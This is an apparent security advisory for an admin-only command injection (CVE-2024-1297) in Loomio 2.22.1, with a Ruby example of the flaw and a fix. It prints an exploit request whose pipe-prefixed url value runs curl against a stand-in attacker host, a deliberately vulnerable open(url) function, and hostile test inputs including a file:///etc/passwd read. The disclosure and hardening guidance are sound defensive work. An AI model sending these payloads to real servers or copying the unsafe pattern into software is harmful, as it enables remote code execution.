Loomio 2.22.1 - Code injection
Summary
Name | Loomio 2.22.1 - Code injection |
Code name | |
Product | Loomio |
Affected versions | Version 2.22.1 |
State | Public |
Release date | 2024-02-29 |
Vulnerability
Kind | OS Command Injection |
Rule | |
Remote | Yes |
CVSSv3.1 Vector | CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H |
CVSSv3.1 Base Score | 7.2 |
Exploit available | Yes |
CVE ID(s) | CVE-2024-1297 |
Description
Loomio version 2.22.1 allows executing arbitrary commands on the server. The application is vulnerable to OS Command Injection through the url parameter of the admin group import endpoint (/admin/groups/import_json).
Vulnerability
A command injection vulnerability has been identified in Loomio that allows an attacker with administrator privileges (PR:H in the CVSS vector) to obtain remote code execution on the server. It is triggered by sending a crafted value in the url parameter of the group JSON import endpoint: the value begins with a pipe character, so instead of being fetched as an address it causes the server to execute curl against an attacker-controlled host.
Exploit
A crafted value is sent in the url parameter of the admin group import endpoint:
POST /admin/groups/import_json HTTP/2.0
Host: vulnerable.com
Content-Type: application/x-www-form-urlencoded
Content-Length: XX
url=|curl+'https://hacker.com/'
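The request above works because a string beginning with "|" is treated by Ruby's Kernel#open as a command to spawn rather than a file or URL to read, which is exactly the shape of the payload. The following Ruby example is added here to illustrate the pattern and a hardened replacement; it is not Loomio's code and the function and class names (fetch_json_unsafe, validate_import_url, fetch_json_safe, UnsafeUrlError) are this example's own. The hardened version parses the value as a URI, accepts only http(s) URLs with a host, and fetches them with Net::HTTP, which never interprets the string as a command.

```ruby
require 'uri'
require 'net/http'
require 'json'

# Vulnerable pattern (illustration, not Loomio's code): Kernel#open spawns
# a subprocess when its argument starts with "|", so a user-controlled
# value such as "|curl 'https://hacker.com/'" runs curl on the server.
def fetch_json_unsafe(url)
  open(url).read # Kernel#open, not URI.open: "|cmd" becomes IO.popen("cmd")
end

class UnsafeUrlError < StandardError; end

# Hardened: parse as a URI and allow only absolute http(s) URLs with a host.
# Anything else (pipe prefixes, file://, bare paths, malformed input) is
# rejected before any I/O happens.
def validate_import_url(url)
  uri = URI.parse(url.to_s)
  unless uri.is_a?(URI::HTTP) && uri.host && !uri.host.empty?
    raise UnsafeUrlError, "only absolute http(s) URLs are accepted"
  end
  uri
rescue URI::InvalidURIError
  raise UnsafeUrlError, "malformed URL"
end

# Fetch the validated URL with Net::HTTP, which treats the value strictly as
# a network address, and parse the body as JSON.
def fetch_json_safe(url)
  uri = validate_import_url(url)
  res = Net::HTTP.get_response(uri)
  raise UnsafeUrlError, "unexpected HTTP status #{res.code}" unless res.is_a?(Net::HTTPSuccess)
  JSON.parse(res.body)
end

if __FILE__ == $PROGRAM_NAME
  # Constructed payloads: the advisory's shape, a local-file attempt, a sane URL.
  ["|echo pwned", "|curl 'https://hacker.com/'", "file:///etc/passwd",
   "https://example.com/group.json"].each do |candidate|
    begin
      puts "#{candidate.inspect} -> accepted as #{validate_import_url(candidate)}"
    rescue UnsafeUrlError => e
      puts "#{candidate.inspect} -> rejected (#{e.message})"
    end
  end
end
```

Running the script shows the three hostile inputs rejected and only the https URL accepted; fetch_json_unsafe("|echo pwned") by contrast returns the output of the spawned echo process, which is the primitive the exploit request abuses with curl.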
Evidence of exploitation
Our security policy
We have reserved the ID CVE-2024-1297 to refer to this issue from now on.
System Information
- Version: Loomio 2.22.1
- Operating System: macOS
Mitigation
An updated version of Loomio containing the patch referenced below is available from the vendor page.
Credits
The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.
References
Vendor page https://github.com/loomio/loomio/
CVE addressed | Patch https://github.com/loomio/loomio/commit/6bc5429bfb5a9c7c811a4487d97ea54a8b23a0fa#diff-b9a7e6b3dfb0fd855c11198a7c53e6f6f90945f28c78cc5dbd960d04d5d28203
Timeline
2024-02-12
Vulnerability discovered.
2024-02-12
Vendor contacted.
2024-02-19
Vendor replied acknowledging the report.
2024-02-25
Vendor confirmed the vulnerability.
2024-02-25
Vulnerability patched.
2024-02-29
Public disclosure.